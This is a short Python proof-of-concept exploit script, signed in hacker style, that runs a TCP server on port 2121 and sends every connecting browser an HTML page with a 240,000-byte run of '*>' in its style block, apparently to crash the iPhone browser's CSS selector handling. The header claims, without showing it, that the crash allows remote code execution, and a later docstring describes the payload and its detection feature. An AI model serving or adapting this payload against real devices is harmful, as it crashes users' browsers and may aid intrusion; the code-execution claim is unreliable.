#!/usr/bin/python
# ,
#dM
#MMr
# 4MMML.
# MMMMM.xf
# ."M6MMM .MM-
#Mh..+MM5MMM.MMMM
#.MMM. .MMMMML.MMMMMh
# )MMMh.MM5MMM MMMMMMM
#3MMMMx. 'MMM3MMfxnMMMMMM"
#'*MMMMMMMMMMM. nMMMMMMP"
#*MMMMMx"MMM5M\.MMMMMMM=
# *MMMMMh "MMMMM" JMMMMMMP
# MMMMMM GMMMM.dMMMMMM.
#MMMMMM"MMMM.MMMMM(.nnMP"
# ..*MMMMxMMM"dMMMM".nnMMMMM*
#"MMn... 'MMMMr 'MM MMM" .nMMMMMMM*"
# "4MMMMnn.. *MMMMMMMP".dMMMMMMM""
# ^MMMMMMMMx.*ML "M .M*.MMMMMM**"
#*PMMMMMMhn. *x > M.MMMM**""
# ""**MMMMhx/.h/ .=*"
#.3P"%....
# [t12]nP" "*MMnx
# SMOKE WEED
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
#this is a remote crash bug, however an analysis of the debug dump shows remote code execution capability, I am just lazy

import sys, socket


def main():
    """Serve one fixed HTML page to every client that connects on TCP port 2121.

    The page's <style> element opens with 120000 repetitions of the two
    characters ``*>`` (240000 bytes) followed by a single ordinary rule.
    According to the header comment this is the input that crashes the
    iPhone browser's CSS selector handling. The remark about code
    execution is the author's reading of a crash dump; this script only
    delivers the oversized selector and demonstrates nothing beyond that.

    For detection and regression testing, the distinguishing feature of
    the response is the long unbroken run of ``*>`` inside a style block.
    Affected and fixed versions are not stated in this file.

    The function never returns: it accepts connections in an endless loop.
    """
    # Fixed markup on either side of the oversized selector run.
    prefix = """ <html> <head> <style type="text/css"> """
    suffix = """ body {background: blue;} </style> </head> </html> """
    page = prefix + "*>" * 120000 + suffix

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # An empty host string binds every local interface, so the listener is
    # reachable from any host that can route to this machine on port 2121.
    listener.bind(('', 2121))
    listener.listen(1)

    while True:
        conn, peer = listener.accept()
        # Echo whatever the client sent first (up to 1024 bytes) to stdout.
        print(conn.recv(1024))
        # The page is written straight to the socket: no HTTP status line or
        # headers precede it. send() is called once and its return value is
        # ignored, so a client may receive a truncated page.
        conn.send(page)
        conn.close()


main()